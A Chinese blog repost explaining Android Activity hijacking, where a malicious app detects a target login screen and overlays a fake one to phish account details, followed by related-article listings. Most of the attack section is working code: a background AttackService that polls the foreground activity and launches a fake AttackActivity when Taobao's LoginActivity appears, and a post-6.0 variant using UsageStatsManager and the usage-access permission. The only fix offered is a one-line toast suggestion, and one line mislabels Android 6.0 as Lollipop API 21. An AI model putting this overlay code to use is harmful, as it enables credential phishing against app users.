Android 6.0 前\后怎么做Activity劫持

最新推荐文章于 2022-06-01 10:39:11 发布
最新推荐文章于 2022-06-01 10:39:11 发布
阅读量187 收藏
点赞数
文章标签: 移动开发
原文链接:http://www.cnblogs.com/mysticbinary/articles/10599248.html
版权

目录

Activity劫持的危害

界面劫持是指当客户端程序调用一个应用界面时,被恶意的第三方程序探知,如果该界面组件是恶意程序预设的攻击对象,恶意程序立即启动自己的仿冒界面并覆盖在客户端程序界面之上。此时用户可能在无察觉的情况下将自己的账号、密码信息输入到仿冒的信息输入界面中,恶意程序再把这些数据返回到服务器中,完成钓鱼攻击。

目前主要的界面劫持攻击通常发生在Android6.0以下的设备中。界面劫持风险将导致用户关键信息,例如账号、密码、银行卡等关键信息被窃取等风险。


Android 6.0 前怎么劫持

Android 6.0(Android 6.0 = Lollipop API level 21) 之前劫持的方法很简单。

ActivityManager activityManager = (ActivityManager) this.getSystemService(Context.ACTIVITY_SERVICE);
ActivityManager.RunningTaskInfo info = manager.getRunningTasks(1).get(0);
String shortClassName = info.topActivity.getShortClassName();    //类名
String className = info.topActivity.getClassName();              //完整类名
String packageName = info.topActivity.getPackageName();          //包名

一个完整的劫持案例

  1. 注册一个空白Activity,作为冒充的页面
    AttackActivity

  2. 注册一个服务,循环监听顶层Activity包名
package com.example.Demo;

import android.app.ActivityManager;
import android.app.Service;
import android.content.Context;
import android.content.Intent;
import android.os.IBinder;
import android.support.annotation.Nullable;
import android.util.Log;
import android.os.Handler;

/**
 * Created by Mysticbinary on 2019/3/25.
 */

public class AttackService extends Service {

    private Handler handler;
    private int temp = 1;

    @Nullable
    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }

    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        Log.i("777777:", "后台启动...");

        handler = new Handler();
        new Thread(new Runnable() {
            @Override
            public void run() {
                while (temp == 1) {
                    try {
                        Log.i("777777:", "handler run ing...");
                        ActivityManager manager = (ActivityManager) getSystemService(Context.ACTIVITY_SERVICE);
                        ActivityManager.RunningTaskInfo info = manager.getRunningTasks(1).get(0);
                        //String shortClassName = info.topActivity.getShortClassName();    //类名
                        String className = info.topActivity.getClassName();              //完整类名
                        //String packageName = info.topActivity.getPackageName();          //包名
                        //Log.i("777777 :", shortClassName);
                        Log.i("777777 当前Top Activity :", className);
                        //Log.i("777777 :", packageName);
                        if(className.contains("com.taobao.controllers.activity.LoginActivity")){
                            Log.i("777777 :", "开始跳转到假页面去!!!");
                            Intent intent = new Intent(getBaseContext(), AttackActivity.class);
                            intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
                            getApplication().startActivity(intent);
                        }
                        Thread.sleep(2000);
                    } catch (InterruptedException e) {
                        e.printStackTrace();
                    }
                }
            }
        }).start();
        return super.onStartCommand(intent, flags, startId);
    }

    @Override
    public void onDestroy() {
        temp = 0;
        super.onDestroy();
        Log.i("777777 :", "后台结束!");
    }
}


Android 6.0 后怎么劫持

到了Android6.0版本之后,即Marshmallow(api level 23)时,大部分方法都失效了,如同getSystemService(Context.ACTIVITY_SERVICE)之类的方法除了能获取自己app中的信息外,还能获取启动器的信息,其它APP一律不显示。道理是很简单的,Marshmallow以权限严格著称,因此对于这种可能泄露其他应用信息的方法一概禁止了。

可以看出到了Android6.0后,即使有方法能获取到,也是非常麻烦的,需要用户手动授权的。

一个完整的劫持案例

1.修改AndroidManifest.xml,添加权限

<?xml version="1.0" encoding="utf-8"?>
<!--注意这里:添加xmlns:tools="http://schemas.android.com/tools"-->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    package="com.dumaisoft.wxb.gettopactivity">
    <application
        ...
    </application>
    <!--注意这里:添加权限-->
    <uses-permission
        android:name="android.permission.PACKAGE_USAGE_STATS"
        tools:ignore="ProtectedPermissions"/>
</manifest>

2.检测并引导用户开启权限
从Marshmallow开始,用户可以一个一个的给app授权,意味着系统对权限的管理更加严格了。这里,我们的app必须让用户开启“Apps with usage access”权限。检测用户是否开启权限的代码;

//检测用户是否对本app开启了“Apps with usage access”权限
private boolean hasPermission() {
     AppOpsManager appOps = (AppOpsManager)
                getSystemService(Context.APP_OPS_SERVICE);
     int mode = 0;
     if (Build.VERSION.SDK_INT > Build.VERSION_CODES.KITKAT) {
         mode = appOps.checkOpNoThrow(AppOpsManager.OPSTR_GET_USAGE_STATS,
                    android.os.Process.myUid(), getPackageName());
    }
         return mode == AppOpsManager.MODE_ALLOWED;
 }

引导用户开启权限的代码

private static final int MY_PERMISSIONS_REQUEST_PACKAGE_USAGE_STATS = 1101;
@Override
protected void onActivityResult(int requestCode, int resultCode, 
Intent data) {
      if (requestCode == MY_PERMISSIONS_REQUEST_PACKAGE_USAGE_STATS) {
         if (!hasPermission()) {
            //若用户未开启权限,则引导用户开启“Apps with usage access”权限
            startActivityForResult(
                  new Intent(Settings.ACTION_USAGE_ACCESS_SETTINGS),
             MY_PERMISSIONS_REQUEST_PACKAGE_USAGE_STATS);
            }
        }
    }

3.使用UsageStatsManager来获取当前运行的app

private void getTopApp(Context context) {
     if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {
            UsageStatsManager m = (UsageStatsManager) context.getSystemService(Context.USAGE_STATS_SERVICE);
                if (m != null) {
                    long now = System.currentTimeMillis();
                    //获取60秒之内的应用数据
                    List<UsageStats> stats = m.queryUsageStats(UsageStatsManager.INTERVAL_BEST, now - 60 * 1000, now);
                    Log.i(TAG, "Running app number in last 60 seconds : " + stats.size());
                    String topActivity = "";
                    //取得最近运行的一个app,即当前运行的app
                    if ((stats != null) && (!stats.isEmpty())) {
                        int j = 0;
                        for (int i = 0; i < stats.size(); i++) {
                            if (stats.get(i).getLastTimeUsed() > stats.get(j).getLastTimeUsed()) {
                                j = i;
                            }
                        }
                        topActivity = stats.get(j).getPackageName();
                    }
                    Log.i(TAG, "top running app is : "+topActivity);
                }
            }
     }

获取的Log

04-24 13:28:06.041 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.example.android.apis
04-24 13:28:08.082 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:08.082 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.example.android.apis
04-24 13:28:10.111 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:10.111 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.google.android.googlequicksearchbox
04-24 13:28:12.117 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:12.117 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.google.android.googlequicksearchbox
04-24 13:28:14.155 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:14.155 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.android.dialer
04-24 13:28:16.190 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:16.190 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.android.dialer
04-24 13:28:18.232 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:18.232 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.google.android.googlequicksearchbox
04-24 13:28:20.279 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:20.279 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.android.messaging
04-24 13:28:22.311 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: Running app number in last 60 seconds : 24
04-24 13:28:22.311 25119-25239/com.dumaisoft.wxb.gettopactivity I/TestService: top running app is : com.google.android.googlequicksearchbox


修复建议

页面切换到后台时,打个Toast提示一下。
例如 大部分的银行类APP里面的任何界面切换到后台都会Toast提示:XXXX已切换至后台运行

转载于:https://www.cnblogs.com/mysticbinary/articles/10599248.html

weixin_30793643
关注
android 屏幕劫持
04-09
android允许用户查看当栈中的任务,导致系统不安全 这是一个小程序实现屏幕劫持
Android Activity劫持方案
黄小梁的博客
08-25 4783
最近,安全合规部门又对金融类、银行类app进行了大规模的多方面安全检查,其中有一项安全问题:Activity劫持。其实Android界面劫持我们app这边也是了的,但是为啥还会有这些问题呢?自我感觉就是绝不会有此类问题,于是我们向检测部门要了劫持工具,但是事实往往是打脸的。。。。。 那么什么是Activity劫持呢?简单的说就是我们APP正常的Activity界面恶意攻替换上仿冒的恶意Activity界面进行攻击和非法用途。界面劫持攻击通常难被识别出来,其造成的后果必然会给用户带来严重损失。 举个例.
Android安全风险与防范措施--Activity劫持
weixin_56945835的博客
04-14 1779
Activity劫持风险与防范措施 在Android系统问世不久,曾发生过这样的事情,用户在正常输入用户名、密码的情况,账密信息缺被盗的情况,why? 我们在使用银行类app,只要我们的银行app客户端退至后台,为啥总会提示一下我们,“***已退至后台”的字样,why? 今天我们就一起来聊聊 activity劫持的那些事。 Activity是我们构建app应用的基本页面,而android app activity页面的管理,是通过栈 来管理的。而在activity 启动,“FLAG_ACTIVITY_
Android6.0以后,怎样获取当运行的app
朱志辉的博客
08-03 1万+
Android5.0,即Lollipop(api level 21)之,大家都幸福的使用如下代码来获得当运行的app,即所谓的top ActivityActivityManager activityManager = (ActivityManager) this.getSystemService(Context.ACTIVITY_SERVICE); ComponentName cn =
android访问短信权限,Android 使用情况访问权限
weixin_31869917的博客
05-26 1556
问题描述添加了使用情况访问权限,如果不开启权限就不让进去,但是发现如果不开启,直接点击返回的话,会再次进入页面但是下面的列表数据不出现问题出现的环境背景及自己尝试过哪些方法第一次出现(进软件的候是可以的),但是点击返回之后就一直转圈点击返回的候,打了个这个I/Timeline: Timeline: Activity_launch_request time:45233510 intent:Int...
Android学习笔记:Android基础知识点(不断更新中)
热门推荐
浩比的专栏
10-28 2万+
1、Android系统的四大组件分别是:活动(Activity)、服务(Service)、广播接收器(Broadcast Receiver)、内容提供器(Content Provider)。 2、定义一个应用程序名的字符串,有以下两种方式来引用它:
如何设计一个优雅健壮的Android WebView?,吊打面试官系列
m0_61417954的博客
09-08 415
} if (mIWebViewClient != null) { mIWebViewClient.onPageFinished(view, newProgress); } } } 可以看到,我们使用了`mProgressFinishThreshold`这个变量控制注入机,这与面提及的`当progress达到80的候,加载出来的页面已经基本可用了`是相呼应的。 > 达到80%很容易,达到100%却很难。 正是因为这个原因,页面的进度加载到80%的...
android面试题
Hubert的博客
04-12 5361
2017.5补充:线程和进程的区别进程是资源分配的最小单位,线程是cpu调度的最小单位。 进程是具有一定独立功能的程序关于某个数据集合上的一次运行活动,进程是系统进行资源分配和调度的一个独立单位。线程是进程的一个实体,是CPU调度和分派的基本单位,它是比进程更小的能独立运行的基本单位。线程自己基本上不拥有系统资源,只拥有一点在运行中必不可少的资源(如程序计数器,一组寄存器和栈),但是它可与同属一个
Xperia Android 调教指南
EXECUTER
12-02 1197
适用范围Android 5.0到6.0, Xperia ROM, 机型在Z5之后。我手上的机器为Xperia XZ, Android 6.0,港行固件。已root,已经解锁Bootloader。调教准备解锁并Root。 Z5及之后的机型都没有免解锁root,解锁后特性丧失,可通过内核的刷入来弥补一部分;对拍照成像质量要求高,对屏幕素质要求高和看中保修的慎解;XZ解锁后在每次开机均有警示标语,提醒机
Android组件安全
micotale的博客
08-21 1178
一.介绍篇 1.Activity (1)访问,串谋攻击 正如Android开发文档中所说的,Android系统组件在制定Intent过滤器(intent-filter)后,默认是可以被外部程序访问的。这就很意味着很容易被其他程序进行串谋攻击,如何防止Activity被外部使用? Android所有组件声明可以通过指定android:exported属性值为false,来设置组件不能被外部...
android 访问权限,Android 使用情况访问权限
weixin_34517026的博客
06-02 2946
问题描述添加了使用情况访问权限,如果不开启权限就不让进去,但是发现如果不开启,直接点击返回的话,会再次进入页面但是下面的列表数据不出现问题出现的环境背景及自己尝试过哪些方法第一次出现(进软件的候是可以的),但是点击返回之后就一直转圈点击返回的候,打了个这个I/Timeline: Timeline: Activity_launch_request time:45233510 intent:Int...
[车联网安全自学篇] ATTACK安全之Android Activity劫持检测与防护
橙留香Park的博客
06-01 2570
Android 界面劫持是指在Android系统中,恶意软件通过监控目标软件的运行,当检测到当运行界面为某个被监控应用的特定界面(一般为登录或支付界面),弹出伪造的钓鱼页面,从而诱导用户输入信息,最终窃取用户的隐私(恶意盗取用户账号、卡号、密码等信息),或者利用假冒界面进行钓鱼欺诈目,还没有什么专门针对Activity劫持的防护方法,因为,这种攻击是用户层面上的,目还无法从代码层面上根除。
获取Android运行的activity之UsageStatsManager
一个Android菜鸟的博客
10-09 1517
言:之总结了如何获取当界面正在运行的APP包名,也就是上一个博客。这里一下补充。 UsageStatsManager是用来统计app使用情况的类,用于获取包含特定间范围的应用包的使用情况统计信息;在Android api21(即Android5.0引入);系统API稳定性好,Android5.0及以后版本都支持,不存在版本兼容问题。 UsageStatsManager源码 下面看如何使用...
Android之使用ACTION_USAGE_ACCESS_SETTINGS权限检测手机多少天没有未使用其它APP
码莎拉蒂
05-09 7898
1 需求 找出手机多少天没有使用的所有APP 2 思路 通过ACTION_USAGE_ACCESS_SETTINGS权限得到多少天已经使用的APP的包名,然后获取手机所有用户APP,剩下的APP就是多少天没有使用的APP。 3 ACTION_USAGE_ACCESS_SETTINGS权限申请 1)在AndroidManifest.xml文件里面定义权限 <uses-permission android:...
Android6.0以后,如何获取当运行的app
LogicTeamLeader的专栏
04-24 7878
言在Android5.0,即Lollipop(api level 21)之,大家都幸福的使用如下代码来获得当运行的app。而Android6.0之后,则必须使用一些新的招数了,本文就详细介绍了这些招数。
AndroidActivity界面劫持劫持
LVXIANGAN的专栏
02-09 2万+
总结: Activity劫持原理1、注册一个receiver,响应android.intent.action.BOOT_COMPLETED,使得开机启动一个service;这个service,会启动一个器,不停循环查询所有当运行的进程(因为app可以枚举系统当运行进程而无需声明其他权限) 2、一旦发现当某一进程的Activity正是我们想要劫持的,并运行在台,我们立马使用FLAG_A...
Android之常见安全问题
Zachary的基地
03-16 2344
Android 常见安全问题 组件安全 Activity访问权限的控制(可能会导致恶意调用页面,接收恶意数据) 1.私有Activity不应被其他应用启动且应该确保相对是安全的 2.关于Intent的使用要谨慎处理接收的Intent以及其携带的信息,尽量不发送敏感信息,并进行数据校验 3.设置android:exported属性,不需要被外部程序调用的组件应该添加android:expo...
Android安全问题 页面劫持
weixin_42171638的博客
12-05 998
所谓页面劫持 ,就是在一些敏感信息输入页面。被一些别有用心的人通过伪造界面弹出覆盖在我们应用界面上,来获取用户敏感信息。 解决方法也很简单,只要判断一些当栈顶的App包名是否和自己应用的相同即可,因为相同的包名在安装会出现异常所以同一部手机上的应用包名都是不同的。 具体解决方案: Android5.0之很好解决,因为我们可以直接获取当手机栈顶的应用包名,但是5.0之后Google废弃...
android检测代码是否执行,Android如何判断一个应用在运行
weixin_33308985的博客
05-26 786
一个应用中,或一个Service 、Receiver中判断一个应用是否正在运行,以便进行一些相关的处理。这个候我们需要得到一个ActivityManager,这个Manager顾名思意就是管理Activity的,它有一个方法叫getRunningTasks,可以得到当系统正在运行的Task的列表,代码如下:ActivityManageram=(ActivityManager)conte...
小米4 Android 6.0 实现后摄像头同步拍摄实例
此外,你还需注意Android 6.0及以上版本对相机权限的动态请求,确保在使用正确处理用户的权限许可。同,由于Android 6.0引入了Camera2 API,可能需要更新代码以兼容新API。 总结来说,本文档提供了Android 6.0...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值